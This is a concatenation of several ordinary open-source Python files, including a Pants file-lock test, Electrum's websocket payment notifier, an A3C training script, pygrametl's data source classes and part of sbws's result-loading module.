"""Removes an item from pinging"""
self.ping_objects.remove(item)
Thread(target=item.stop_thread).start()
def reset(self, item):
"""Resets the item"""
item.ping_data = []
item.success = 0
item.failed = 0
def toggle_logging(self):
"""Toggles logging"""
if self.logging:
for item in self.ping_objects:
item.logging = False
else:
for item in self.ping_objects:
item.logging = True
self.logging = not self.logging
def shutdown(self):
# to_shutdown = self.ping_objects
self.ping_objects = []
# for item in to_shutdown:
# item.stop_thread()
dispatcher.send(signal="Ping Shutdown")
def main():
"""Run stand alone"""
pass
if __name__ == '__main__':
main()
|
test_lock.py
|
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import os
import shutil
import tempfile
import unittest
from multiprocessing import Manager, Process
from threading import Thread
from pants.process.lock import OwnerPrintingInterProcessFileLock
def hold_lock_until_terminate(path, lock_held, terminate):
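# Runs in a child process: acquires the lock, signals the parent through lock_held,
# and keeps holding it until terminate is set (or the 60s safety timeout expires).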
lock = OwnerPrintingInterProcessFileLock(path)
lock.acquire()
lock_held.set()
# NOTE: We shouldn't ever wait this long, this is just to ensure
# we don't somehow leak child processes.
terminate.wait(60)
lock.release()
lock_held.clear()
class TestOwnerPrintingInterProcessFileLock(unittest.TestCase):
def setUp(self):
self.lock_dir = tempfile.mkdtemp()
self.lock_path = os.path.join(self.lock_dir, 'lock')
self.lock = OwnerPrintingInterProcessFileLock(self.lock_path)
self.manager = Manager()
self.lock_held = self.manager.Event()
self.terminate = self.manager.Event()
self.lock_process = Process(
target=hold_lock_until_terminate,
args=(self.lock_path, self.lock_held, self.terminate),
)
def tearDown(self):
self.terminate.set()
try:
shutil.rmtree(self.lock_dir)
except OSError:
pass
def test_non_blocking_attempt(self):
self.lock_process.start()
self.lock_held.wait()
self.assertFalse(self.lock.acquire(blocking=False))
def test_message(self):
self.lock_process.start()
self.lock_held.wait()
self.assertTrue(os.path.exists(self.lock.message_path))
with open(self.lock.message_path, 'r') as f:
message_content = f.read()
self.assertIn(str(self.lock_process.pid), message_content)
os.unlink(self.lock.message_path)
def message_fn(message):
self.assertIn(self.lock.missing_message_output, message)
self.lock.acquire(blocking=False, message_fn=message_fn)
def test_blocking(self):
self.lock_process.start()
self.lock_held.wait()
self.assertFalse(self.lock.acquire(timeout=.1))
acquire_is_blocking = self.manager.Event()
def terminate_subproc(terminate, acquire_is_blocking):
acquire_is_blocking.wait()
terminate.set()
Thread(target=terminate_subproc, args=(self.terminate, acquire_is_blocking)).start()
def message_fn(message):
self.assertIn(str(self.lock_process.pid), message)
acquire_is_blocking.set()
# NOTE: We shouldn't ever wait this long (locally this runs in ~milliseconds)
# but sometimes CI containers are extremely slow, so we choose a very large
# value just in case.
self.assertTrue(self.lock.acquire(timeout=30, message_fn=message_fn))
def test_reentrant(self):
self.assertTrue(self.lock.acquire())
self.assertTrue(self.lock.acquire())
def test_release(self):
self.assertTrue(self.lock.acquire())
self.assertTrue(self.lock.acquired)
self.lock.release()
self.assertFalse(self.lock.acquired)
|
websockets.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import queue
import threading, os, json
from collections import defaultdict
try:
from SimpleWebSocketServer import WebSocket, SimpleSSLWebSocketServer
except ImportError:
import sys
sys.exit("install SimpleWebSocketServer")
from . import util
from .address import Address
request_queue = queue.Queue()
class ElectrumWebSocket(WebSocket):
def handleMessage(self):
assert self.data[0:3] == 'id:'
util.print_error("message received", self.data)
request_id = self.data[3:]
request_queue.put((self, request_id))
def handleConnected(self):
util.print_error("connected", self.address)
def handleClose(self):
util.print_error("closed", self.address)
class WsClientThread(util.DaemonThread):
def __init__(self, config, network):
util.DaemonThread.__init__(self)
self.network = network
self.config = config
self.response_queue = queue.Queue()
self.subscriptions = defaultdict(list)
def make_request(self, request_id):
# read json file
rdir = self.config.get('requests_dir')
n = os.path.join(rdir, 'req', request_id[0], request_id[1], request_id, request_id + '.json')
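# For a hypothetical request id 'abcd' and a 'requests_dir' of
# '/var/requests', the path built above would be
# '/var/requests/req/a/b/abcd/abcd.json'.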
with open(n, encoding='utf-8') as f:
s = f.read()
d = json.loads(s)
addr = d.get('address')
amount = d.get('amount')
return addr, amount
def reading_thread(self):
while self.is_running():
try:
ws, request_id = request_queue.get()
except queue.Empty:
continue
try:
addr, amount = self.make_request(request_id)
except:
continue
l = self.subscriptions.get(addr, [])
l.append((ws, amount))
self.subscriptions[addr] = l
h = Address.from_string(addr).to_scripthash_hex()
self.network.send([('blockchain.scripthash.subscribe', [h])], self.response_queue.put)
def run(self):
threading.Thread(target=self.reading_thread).start()
while self.is_running():
try:
r = self.response_queue.get(timeout=0.1)
except queue.Empty:
continue
util.print_error('response', r)
method = r.get('method')
params = r.get('params')
result = r.get('result')
if result is None:
continue
if method == 'blockchain.scripthash.subscribe':
self.network.send([('blockchain.scripthash.get_balance', params)], self.response_queue.put)
elif method == 'blockchain.scripthash.get_balance':
h = params[0]
addr = self.network.h2addr.get(h, None)
if addr is None:
util.print_error("can't find address for scripthash: %s" % h)
l = self.subscriptions.get(addr, [])
for ws, amount in l:
if not ws.closed:
if sum(result.values()) >= amount:
ws.sendMessage('paid')
class WebSocketServer(threading.Thread):
def __init__(self, config, ns):
threading.Thread.__init__(self)
self.config = config
self.net_server = ns
self.daemon = True
def run(self):
t = WsClientThread(self.config, self.net_server)
t.start()
host = self.config.get('websocket_server')
port = self.config.get('websocket_port', 9999)
certfile = self.config.get('ssl_chain')
keyfile = self.config.get('ssl_privkey')
self.server = SimpleSSLWebSocketServer(host, port, ElectrumWebSocket, certfile, keyfile)
self.server.serveforever()
|
main.py
|
from __future__ import print_function
import argparse
import os
import torch
import torch.multiprocessing as mp
import my_optim
from envs import create_atari_env
from model import ActorCritic
from test import test
from train import train
import time
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001,
help='learning rate (default: 0.0001)')
parser.add_argument('--gamma', type=float, default=0.99,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--tau', type=float, default=1.00,
help='parameter for GAE (default: 1.00)')
parser.add_argument('--entropy-coef', type=float, default=0.01,
help='entropy term coefficient (default: 0.01)')
parser.add_argument('--value-loss-coef', type=float, default=0.5,
help='value loss coefficient (default: 0.5)')
parser.add_argument('--max-grad-norm', type=float, default=50,
help='max gradient norm for clipping (default: 50)')
parser.add_argument('--seed', type=int, default=1,
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4,
help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=20,
help='number of forward steps in A3C (default: 20)')
parser.add_argument('--max-episode-length', type=int, default=1000000,
help='maximum length of an episode (default: 1000000)')
parser.add_argument('--env-name', default='PongDeterministic-v4',
help='environment to train on (default: PongDeterministic-v4)')
parser.add_argument('--no-shared', default=False,
help='use an optimizer without shared momentum.')
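# A minimal invocation sketch; the values shown simply repeat the defaults above:
#   python main.py --env-name PongDeterministic-v4 --num-processes 4 --lr 0.0001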
if __name__ == '__main__':
mp.set_start_method('spawn')
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['CUDA_VISIBLE_DEVICES'] = ""
args = parser.parse_args()
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = ActorCritic(env.observation_space.shape[0], env.action_space)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
processes = []
counter = mp.Value('i', 0)
lock = mp.Lock()
p = mp.Process(target=test, args=(args.num_processes, args, shared_model, counter))
p.start()
processes.append(p)
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, counter, lock, optimizer, False))
p.start()
processes.append(p)
time.sleep(5)
for p in processes:
p.join()
|
datasources.py
|
"""This module holds classes that can be used as data soures. Note that it is
easy to create other data sources: A data source must be iterable and
provide dicts that map from attribute names to attribute values.
"""
# Copyright (c) 2009-2020, Aalborg University (pygrametl@cs.aau.dk)
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from csv import DictReader
import sys
if sys.platform.startswith('java'):
# Jython specific code
from pygrametl.jythonmultiprocessing import Queue, Process
else:
from multiprocessing import Queue, Process
try:
from Queue import Empty # Python 2
except ImportError:
from queue import Empty # Python 3
__all__ = ['CSVSource', 'TypedCSVSource', 'SQLSource', 'PandasSource',
'JoiningSource', 'HashJoiningSource', 'MergeJoiningSource',
'BackgroundSource', 'ProcessSource', 'MappingSource',
'TransformingSource', 'UnionSource', 'CrossTabbingSource',
'FilteringSource', 'DynamicForEachSource', 'RoundRobinSource']
CSVSource = DictReader
class TypedCSVSource(DictReader):
"""A class for iterating a CSV file and type cast the values."""
def __init__(self, f, casts, fieldnames=None, restkey=None,
restval=None, dialect='excel', *args, **kwds):
"""Arguments:
- f: An iterable object such as a file. Passed on to
csv.DictReader
- casts: A dict mapping from attribute names to functions to apply
to these names, e.g., {'id':int, 'salary':float}
- fieldnames: Passed on to csv.DictReader
- restkey: Passed on to csv.DictReader
- restval: Passed on to csv.DictReader
- dialect: Passed on to csv.DictReader
- *args: Passed on to csv.DictReader
- **kwds: Passed on to csv.DictReader
"""
DictReader.__init__(self, f, fieldnames=fieldnames,
restkey=restkey, restval=restval, dialect=dialect,
*args, **kwds)
if not type(casts) == dict:
raise TypeError("The casts argument must be a dict")
for v in casts.values():
if not callable(v):
raise TypeError("The values in casts must be callable")
self._casts = casts
def __next__(self): # For Python 3
row = DictReader.__next__(self)
for (att, func) in self._casts.items():
row[att] = func(row[att])
return row
def next(self): # For Python 2
row = DictReader.next(self)
for (att, func) in self._casts.items():
row[att] = func(row[att])
return row
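# A minimal usage sketch for TypedCSVSource, assuming a hypothetical CSV file
# 'people.csv' with the columns 'id' and 'salary'.
def _typed_csv_source_example():
    with open('people.csv', 'r') as csvfile:
        source = TypedCSVSource(csvfile, casts={'id': int, 'salary': float})
        for row in source:
            print(row)  # values arrive already cast, e.g. {'id': 1, 'salary': 1200.0}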
class SQLSource(object):
"""A class for iterating the result set of a single SQL query."""
def __init__(self, connection, query, names=(), initsql=None,
cursorarg=None, parameters=None):
"""Arguments:
- connection: the PEP 249 connection to use. NOT a
ConnectionWrapper!
- query: the query that generates the result
- names: names of attributes in the result. If not set,
the names from the database are used. Default: ()
- initsql: SQL that is executed before the query. The result of this
initsql is not returned. Default: None.
- cursorarg: if not None, this argument is used as an argument when
the connection's cursor method is called. Default: None.
- parameters: if not None, this sequence or mapping of parameters
will be sent when the query is executed.
"""
self.connection = connection
if cursorarg is not None:
self.cursor = connection.cursor(cursorarg)
else:
self.cursor = connection.cursor()
if initsql:
self.cursor.execute(initsql)
self.query = query
self.names = names
self.executed = False
self.parameters = parameters
def __iter__(self):
try:
if not self.executed:
if self.parameters:
self.cursor.execute(self.query, self.parameters)
else:
self.cursor.execute(self.query)
names = None
if self.names or self.cursor.description:
names = self.names or \
[t[0] for t in self.cursor.description]
while True:
data = self.cursor.fetchmany(500)
if not data:
break
if not names:
# We do this to support cursor objects that only have
# a meaningful .description after data has been fetched.
# This is, for example, the case when using a named
# psycopg2 cursor.
names = [t[0] for t in self.cursor.description]
if len(names) != len(data[0]):
raise ValueError(
"Incorrect number of names provided. " +
"%d given, %d needed." % (len(names), len(data[0])))
for row in data:
yield dict(zip(names, row))
finally:
try:
self.cursor.close()
except Exception:
pass
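# A minimal usage sketch for SQLSource using an in-memory sqlite3 connection;
# the table and column names are made up for the example.
def _sql_source_example():
    import sqlite3
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE emp (id INTEGER, name TEXT)')
    conn.execute("INSERT INTO emp VALUES (1, 'Ann')")
    for row in SQLSource(connection=conn, query='SELECT id, name FROM emp'):
        print(row)  # e.g. {'id': 1, 'name': 'Ann'}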
class PandasSource(object):
"""A source for iterating a Pandas DataFrame and cast each row to a dict."""
def __init__(self, dataFrame):
"""Arguments:
- dataFrame: A Pandas DataFrame
"""
self._dataFrame = dataFrame
def __iter__(self):
for (_, series) in self._dataFrame.iterrows():
row = series.to_dict()
yield row
class ProcessSource(object):
"""A class for iterating another source in a separate process"""
def __init__(self, source, batchsize=500, queuesize=20):
"""Arguments:
- source: the source to iterate
- batchsize: the number of rows passed from the worker process each
time it passes on a batch of rows. Must be positive. Default: 500
- queuesize: the maximum number of batches that can wait in a queue
between the processes. 0 means unlimited. Default: 20
"""
if not isinstance(batchsize, int) or batchsize < 1:
raise ValueError('batchsize must be a positive integer')
self.__source = source
self.__batchsize = batchsize
self.__queue = Queue(queuesize)
p = Process(target=self.__worker)
p.name = "Process for ProcessSource"
p.start()
def __worker(self):
batch = []
try:
for row in self.__source:
batch.append(row)
if len(batch) == self.__batchsize:
self.__queue.put(batch)
batch = []
# We're done. Send the batch if it has any data and a signal
if batch:
self.__queue.put(batch)
self.__queue.put('STOP')
except Exception:
# Jython 2.5.X does not support the as syntax required by Python 3
e = sys.exc_info()[1]
if batch:
self.__queue.put(batch)
self.__queue.put('EXCEPTION')
self.__queue.put(e)
def __iter__(self):
while True:
data = self.__queue.get()
if data == 'STOP':
break
elif data == 'EXCEPTION':
exc = self.__queue.get()
raise exc
# else we got a list of rows from the other process
for row in data:
yield row
BackgroundSource = ProcessSource # for compatibility
# The old thread-based BackgroundSource has been removed and
# replaced by ProcessSource
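# A minimal usage sketch for ProcessSource; a plain list of dicts stands in
# for a real source, and the batchsize is arbitrary.
def _process_source_example():
    rows = [{'id': i} for i in range(10)]
    for row in ProcessSource(rows, batchsize=4):
        print(row)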
class HashJoiningSource(object):
"""A class for equi-joining two data sources."""
def __init__(self, src1, key1, src2, key2):
"""Arguments:
- src1: the first source. This source is iterated row by row.
- key1: the attribute of the first source to use in the join
- src2: the second source. The rows of this source are all loaded
into memory.
- key2: the attribute of the second source to use in the join.
"""
self.__hash = {}
self.__src1 = src1
self.__key1 = key1
self.__src2 = src2
self.__key2 = key2
def __buildhash(self):
for row in self.__src2:
keyval = row[self.__key2]
l = self.__hash.get(keyval, [])
l.append(row)
self.__hash[keyval] = l
self.__ready = True
def __iter__(self):
self.__buildhash()
for row in self.__src1:
matches = self.__hash.get(row[self.__key1], [])
for match in matches:
newrow = row.copy()
newrow.update(match)
yield newrow
JoiningSource = HashJoiningSource # for compatibility
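# A minimal usage sketch for HashJoiningSource, equi-joining two in-memory
# sources on the hypothetical attribute 'id'.
def _hash_joining_source_example():
    people = [{'id': 1, 'name': 'Ann'}, {'id': 2, 'name': 'Bob'}]
    salaries = [{'id': 1, 'salary': 1200.0}, {'id': 2, 'salary': 1500.0}]
    for row in HashJoiningSource(people, 'id', salaries, 'id'):
        print(row)  # e.g. {'id': 1, 'name': 'Ann', 'salary': 1200.0}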
class MergeJoiningSource(object):
"""A class for merge-joining two sorted data sources"""
def __init__(self, src1, key1, src2, key2):
"""Arguments:
- src1: a data source
- key1: the attribute to use from src1
- src2: a data source
- key2: the attribute to use from src2
"""
self.__src1 = src1
self.__key1 = key1
self.__src2 = src2
self.__key2 = key2
self.__next = None
def __iter__(self):
iter1 = self.__src1.__iter__()
iter2 = self.__src2.__iter__()
row1 = next(iter1)
keyval1 = row1[self.__key1]
rows2 = self.__getnextrows(iter2)
keyval2 = rows2[0][self.__key2]
try:
while True: # At one point there will be a StopIteration
if keyval1 == keyval2:
# Output rows
for part in rows2:
resrow = row1.copy()
resrow.update(part)
yield resrow
row1 = next(iter1)
keyval1 = row1[self.__key1]
elif keyval1 < keyval2:
row1 = next(iter1)
keyval1 = row1[self.__key1]
else: # k1 > k2
rows2 = self.__getnextrows(iter2)
keyval2 = rows2[0][self.__key2]
except StopIteration:
return # Needed in Python 3.7+ due to PEP 479
def __getnextrows(self, iterval):
res = []
keyval = None
if self.__next is not None:
res.append(self.__next)
keyval = self.__next[self.__key2]
self.__next = None
while True:
try:
row = next(iterval)
except StopIteration:
if res:
return res
else:
raise
if keyval is None:
keyval = row[self.__key2] # for the first row in this round
if row[self.__key2] == keyval:
res.append(row)
else:
self.__next = row
return res
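# A minimal usage sketch for MergeJoiningSource; both sources must already be
# sorted on the join key, here the hypothetical attribute 'k'.
def _merge_joining_source_example():
    src1 = [{'k': 1, 'a': 'x'}, {'k': 2, 'a': 'y'}]
    src2 = [{'k': 1, 'b': 10}, {'k': 2, 'b': 20}]
    for row in MergeJoiningSource(src1, 'k', src2, 'k'):
        print(row)  # e.g. {'k': 1, 'a': 'x', 'b': 10}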
class MappingSource(object):
"""A class for iterating a source and applying a function to each column."""
def __init__(self, source, callables):
"""Arguments:
- source: A data source
- callables: A dict mapping from attribute names to functions to
apply to these names, e.g. type casting {'id':int, 'salary':float}
"""
if not type(callables) == dict:
raise TypeError("The callables argument must be a dict")
for v in callables.values():
if not callable(v):
raise TypeError("The values in callables must be callable")
self._source = source
self._callables = callables
def __iter__(self):
for row in self._source:
for (att, func) in self._callables.items():
row[att] = func(row[att])
yield row
class TransformingSource(object):
"""A source that applies functions to the rows from another source"""
def __init__(self, source, *transformations):
"""Arguments:
- source: a data source
- *transformations: the transformations to apply. Must be callables
of the form func(row) where row is a dict. Will be applied in the
given order.
"""
self.__source = source
self.__transformations = transformations
def __iter__(self):
for row in self.__source:
for func in self.__transformations:
func(row)
yield row
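# A minimal usage sketch for TransformingSource; the attribute 'name' and the
# whitespace-stripping transformation are made up for the example.
def _transforming_source_example():
    def strip_name(row):
        row['name'] = row['name'].strip()
    rows = [{'name': ' Ann '}, {'name': 'Bob  '}]
    for row in TransformingSource(rows, strip_name):
        print(row)  # e.g. {'name': 'Ann'}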
class CrossTabbingSource(object):
"""A source that produces a crosstab from another source"""
def __init__(self, source, rowvaluesatt, colvaluesatt, values,
aggregator=None, nonevalue=0, sortrows=False):
"""Arguments:
- source: the data source to pull data from
- rowvaluesatt: the name of the attribute that holds the values that
appear as rows in the result
- colvaluesatt: the name of the attribute that holds the values that
appear as columns in the result
- values: the name of the attribute that holds the values to aggregate
- aggregator: the aggregator to use (see pygrametl.aggregators). If not
given, pygrametl.aggregators.Sum is used to sum the values
- nonevalue: the value to return when there is no data to aggregate.
Default: 0
- sortrows: A boolean deciding if the rows should be sorted.
Default: False
"""
self.__source = source
self.__rowvaluesatt = rowvaluesatt
self.__colvaluesatt = colvaluesatt
self.__values = values
if aggregator is None:
from pygrametl.aggregators import Sum
self.__aggregator = Sum()
else:
self.__aggregator = aggregator
self.__nonevalue = nonevalue
self.__sortrows = sortrows
self.__allcolumns = set()
self.__allrows = set()
def __iter__(self):
for data in self.__source: # first we iterate over all source data ...
row = data[self.__rowvaluesatt]
col = data[self.__colvaluesatt]
self.__allrows.add(row)
self.__allcolumns.add(col)
self.__aggregator.process((row, col), data[self.__values])
# ... and then we build result rows
for row in (self.__sortrows and sorted(self.__allrows) or
self.__allrows):
res = {self.__rowvaluesatt: row}
for col in self.__allcolumns:
res[col] = \
self.__aggregator.finish((row, col), self.__nonevalue)
yield res
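# A minimal usage sketch for CrossTabbingSource, pivoting hypothetical sales
# rows so products become rows, years become columns, and amounts are summed
# (pygrametl.aggregators.Sum is the default aggregator).
def _cross_tabbing_source_example():
    sales = [{'product': 'tea', 'year': 2020, 'amount': 5},
             {'product': 'tea', 'year': 2021, 'amount': 7},
             {'product': 'coffee', 'year': 2020, 'amount': 3}]
    for row in CrossTabbingSource(sales, 'product', 'year', 'amount'):
        print(row)  # e.g. {'product': 'tea', 2020: 5, 2021: 7}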
class FilteringSource(object):
"""A source that applies a filter to another source"""
def __init__(self, source, filter=bool):
"""Arguments:
- source: the source to filter
- filter: a callable f(row). If the result is a True value,
the row is passed on. If not, the row is discarded.
Default: bool, i.e., Python's standard boolean conversion which
removes empty rows.
"""
self.__source = source
self.__filter = filter
def __iter__(self):
for row in self.__source:
if self.__filter(row):
yield row
class UnionSource(object):
"""A source to union other sources (possibly with different types of rows).
All rows are read from the 1st source before rows are read from the 2nd
source and so on (to interleave the rows, use a RoundRobinSource)
"""
def __init__(self, *sources):
"""Arguments:
- *sources: The sources to union in the order they should be used.
"""
self.__sources = sources
def __iter__(self):
for src in self.__sources:
for row in src:
yield row
class RoundRobinSource(object):
"""A source that reads sets of rows from sources in round robin-fashion"""
def __init__(self, sources, batchsize=500):
"""Arguments:
- sources: a sequence of data sources
- batchsize: the amount of rows to read from a data source before
going to the next data source. Must be positive (to empty a source
before going to the next, use UnionSource)
"""
self.__sources = [iter(src) for src in sources]
self.__sources.reverse() # we iterate it from the back in __iter__
if not batchsize > 0:
raise ValueError("batchsize must be positive")
self.__batchsize = batchsize
def __iter__(self):
while self.__sources:
# iterate from back
for i in range(len(self.__sources) - 1, -1, -1):
cursrc = self.__sources[i]
# now return up to __batchsize from cursrc
try:
for _ in range(self.__batchsize):
yield next(cursrc)
except StopIteration:
# we're done with this source and can delete it since
# we iterate the list as we do
del self.__sources[i]
return
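# A minimal usage sketch for RoundRobinSource, reading batches of two rows
# from each (hypothetical) source in turn until both are exhausted.
def _round_robin_source_example():
    src_a = [{'v': 1}, {'v': 2}, {'v': 3}]
    src_b = [{'v': 10}, {'v': 20}]
    for row in RoundRobinSource([src_a, src_b], batchsize=2):
        print(row)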
class DynamicForEachSource(object):
"""A source that for each given argument creates a new source that
will be iterated by this source.
For example, useful for directories where a CSVSource should be created
for each file.
The user must provide a function that when called with a single argument,
returns a new source to iterate. A DynamicForEachSource instance can be
given to several ProcessSource instances.
"""
def __init__(self, seq, callee):
"""Arguments:
- seq: a sequence with the elements for each of which a unique
source must be created. the elements are given (one by one) to
callee.
- callee: a function f(e) that must accept elements as those in the
seq argument. the function should return a source which then will
be iterated by this source. the function is called once for every
element in seq.
"""
self.__queue = Queue() # a multiprocessing.Queue
if not callable(callee):
raise TypeError('callee must be callable')
self.__callee = callee
for e in seq:
# put them in a safe queue such that this object can be used from
# different fork'ed processes
self.__queue.put(e)
def __iter__(self):
while True:
try:
arg = self.__queue.get(False)
src = self.__callee(arg)
for row in src:
yield row
except Empty:
return
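# A minimal usage sketch for DynamicForEachSource, creating a CSVSource for
# every file in a hypothetical directory of CSV files.
def _dynamic_for_each_source_example():
    from glob import glob
    filenames = glob('data/*.csv')  # hypothetical directory
    for row in DynamicForEachSource(filenames, lambda name: CSVSource(open(name, 'r'))):
        print(row)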
|
resultdump.py
|
import os
import json
import time
import logging
from glob import glob
from threading import Thread
from threading import RLock
from queue import Queue
from queue import Empty
from datetime import datetime
from datetime import timedelta
from enum import Enum
from sbws.globals import RESULT_VERSION, fail_hard
from sbws.util.filelock import DirectoryLock
from sbws.lib.relaylist import Relay
from .. import settings
log = logging.getLogger(__name__)
def merge_result_dicts(d1, d2):
'''
Given two dictionaries that contain Result data, merge them. Result
dictionaries have keys of relay fingerprints and values of lists of results
for those relays.
'''
for key in d2:
if key not in d1:
d1[key] = []
d1[key].extend(d2[key])
return d1
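# A minimal sketch of the merge behaviour; placeholder strings stand in for
# Result objects and the fingerprints are hypothetical.
def _merge_result_dicts_example():
    d1 = {'FP_A': ['r1']}
    d2 = {'FP_A': ['r2'], 'FP_B': ['r3']}
    assert merge_result_dicts(d1, d2) == {'FP_A': ['r1', 'r2'], 'FP_B': ['r3']}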
def load_result_file(fname, success_only=False):
''' Reads in all lines from the given file, and parses them into Result
structures (or subclasses of Result). Optionally only keeps ResultSuccess.
Returns all kept Results as a result dictionary. This function does not
care about the age of the results '''
assert os.path.isfile(fname)
d = {}
num_total = 0
num_ignored = 0
with DirectoryLock(os.path.dirname(fname)):
with open(fname, 'rt') as fd:
for line in fd:
num_total += 1
try:
r = Result.from_dict(json.loads(line.strip()))
except json.decoder.JSONDecodeError:
log.warning('Could not decode result %s', line.strip())
r = None
if r is None:
num_ignored += 1
continue
if success_only and isinstance(r, ResultError):
continue
fp = r.fingerprint
if fp not in d:
d[fp] = []
d[fp].append(r)
num_kept = sum([len(d[fp]) for fp in d])
log.debug('Keeping %d/%d read lines from %s', num_kept, num_total, fname)
if num_ignored > 0:
log.warning('Had to ignore %d results due to not knowing how to '
'parse them.', num_ignored)
return d
def trim_results(fresh_days, result_dict):
''' Given a result dictionary, remove all Results that are no longer valid
and return the new dictionary '''
assert isinstance(fresh_days, int)
assert isinstance(result_dict, dict)
data_period = fresh_days * 24*60*60
oldest_allowed = time.time() - data_period
out_results = {}
for fp in result_dict:
for result in result_dict[fp]:
if result.time >= oldest_allowed:
if fp not in out_results:
out_results[fp] = []
out_results[fp].append(result)
num_in = sum([len(result_dict[fp]) for fp in result_dict])
num_out = sum([len(out_results[fp]) for fp in out_results])
log.debug('Keeping %d/%d results after removing old ones', num_out, num_in)
return out_results
def trim_results_ip_changed(result_dict, on_changed_ipv4=False,
on_changed_ipv6=False):
"""When there are results for the same relay with different IPs,
create a new results dictionary without that relay's results that used an
older IP.
:param dict result_dict: a dictionary of results
:param bool on_changed_ipv4: whether to trim the results when a relay's
IPv4 changes
:param bool on_changed_ipv6: whether to trim the results when a relay's
IPv6 changes
:returns: a new results dictionary
"""
assert isinstance(result_dict, dict)
new_results_dict = {}
if on_changed_ipv4 is True:
for fp in result_dict.keys():
results = result_dict[fp]
# find if the results for a relay have more than one ipv4
# address
ipv4s = set([result.address for result in results])
if len(ipv4s) > 1:
# keep only the results for the last ip used
# probably we should not just discard all the results for
# a relay that change address
ordered_results = sorted(results, key=lambda r: r.time)
latest_address = ordered_results[-1].address
last_ip_results = [result for result in results
if result.address == latest_address]
new_results_dict[fp] = last_ip_results
else:
new_results_dict[fp] = results
return new_results_dict
if on_changed_ipv6 is True:
log.warning("Reseting bandwidth results when IPv6 changes,"
" is not yet implemented.")
return result_dict
def load_recent_results_in_datadir(fresh_days, datadir, success_only=False,
on_changed_ipv4=False,
on_changed_ipv6=False):
''' Given a data directory, read all results files in it that could have
results in them that are still valid. Trim them, and return the valid
Results as a list '''
assert isinstance(fresh_days, int)
assert os.path.isdir(datadir)
# Inform the results are being loaded, since it takes some seconds.
log.info("Reading and processing previous measurements.")
results = {}
today = datetime.utcfromtimestamp(time.time())
data_period = fresh_days + 2
oldest_day = today - timedelta(days=data_period)
working_day = oldest_day
while working_day <= today:
# Cannot use ** and recursive=True in glob() because we support 3.4
# So instead settle on finding files in the datadir and one
# subdirectory below the datadir that fit the form of YYYY-MM-DD*.txt
d = working_day.date()
patterns = [os.path.join(datadir, '{}*.txt'.format(d)),
os.path.join(datadir, '*', '{}*.txt'.format(d))]
for pattern in patterns:
for fname in glob(pattern):
new_results = load_result_file(
fname, success_only=success_only)
results = merge_result_dicts(results, new_results)
working_day += timedelta(days=1)
results = trim_results(fresh_days, results)
# within the fresh-days period it is possible that a relay changed IP;
# if that's the case, keep only the results for the last IP
results = trim_results_ip_changed(results, on_changed_ipv4,
on_changed_ipv6)
num_res = sum([len(results[fp]) for fp in results])
if num_res == 0:
log.warning('No valid results files found. '
'Probably the sbws scanner was not run first, or '
'it ran more than %d days ago, or '
'it was using a different datadir than %s.', data_period,
datadir)
return results
def write_result_to_datadir(result, datadir):
''' Can be called from any thread '''
assert isinstance(result, Result)
assert os.path.isdir(datadir)
dt = datetime.utcfromtimestamp(result.time)
ext = '.txt'
result_fname = os.path.join(
datadir, '{}{}'.format(dt.date(), ext))
with DirectoryLock(datadir):
log.debug('Writing a result to %s', result_fname)
with open(result_fname, 'at') as fd:
fd.write('{}\n'.format(str(result)))
class _StrEnum(str, Enum):
pass
class _ResultType(_StrEnum):
Success = 'success'
